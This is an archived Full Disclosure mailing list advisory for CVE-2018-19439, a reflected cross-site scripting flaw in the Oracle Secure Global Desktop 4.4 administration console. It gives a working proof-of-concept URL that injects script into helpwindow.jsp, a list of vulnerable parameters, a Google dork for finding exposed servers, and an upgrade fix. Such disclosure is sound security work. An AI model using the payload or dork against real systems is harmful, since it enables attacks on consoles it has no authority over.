Full Disclosure mailing list archives
CVE-2018-19439 - Cross Site Scripting in Oracle Secure Global Desktop Administration Console - 4.4; Build: 20080807152602
From: Rafael Pedrero <rafael.pedrero () gmail com>
Date: Fri, 23 Nov 2018 07:28:29 +0100
<!-- # Exploit Title: Cross Site Scripting in Oracle Secure Global Desktop Administration Console - 4.4; Build: 20080807152602 # Date: 22-11-2018 # Exploit Author: Rafael Pedrero # Vendor Homepage: http://www.oracle.com/ # Software Link: http://www.oracle.com/ # Version: Oracle Secure Global Desktop Administration Console - 4.4; Build: 20080807152602 # Tested on: all # CVE : CVE-2018-19439 # Category: webapps 1. Description Cross Site Scripting exists in the Administration Console in Oracle Secure Global Desktop 4.4 20080807152602. The page "helpwindow.jsp" has reflected XSS via all parameters. 2. Proof of Concept http://X.X.X.X/sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp?=&windowTitle=AdministratorHelp Window></TITLE></HEAD><body><script>alert("XSS")</script><!--&
helpFile=concepts.html&pageTitle=Administrator
Help&mastheadUrl=/images/productNameSecondaryMasthead.png&mastheadDescription=Sun Secure Global Desktop Administration&jspPath=/sgdadmin/faces/com_sun_web_ui/help/&mastheadHeight=40&mastheadWidth=20 Vulnerables parameters: windowTitle, helpFile, pageTitle, mastheadUrl, mastheadDescription, jspPath, mastheadHeight and mastheadWidth. Google dorks: inurl:"/sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp" 3. Solution: Update to the latests version Oracle Secure Global Desktop Administration Console 5.4. --> _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Current thread:
- CVE-2018-19439 - Cross Site Scripting in Oracle Secure Global Desktop Administration Console - 4.4; Build: 20080807152602 Rafael Pedrero (Nov 23)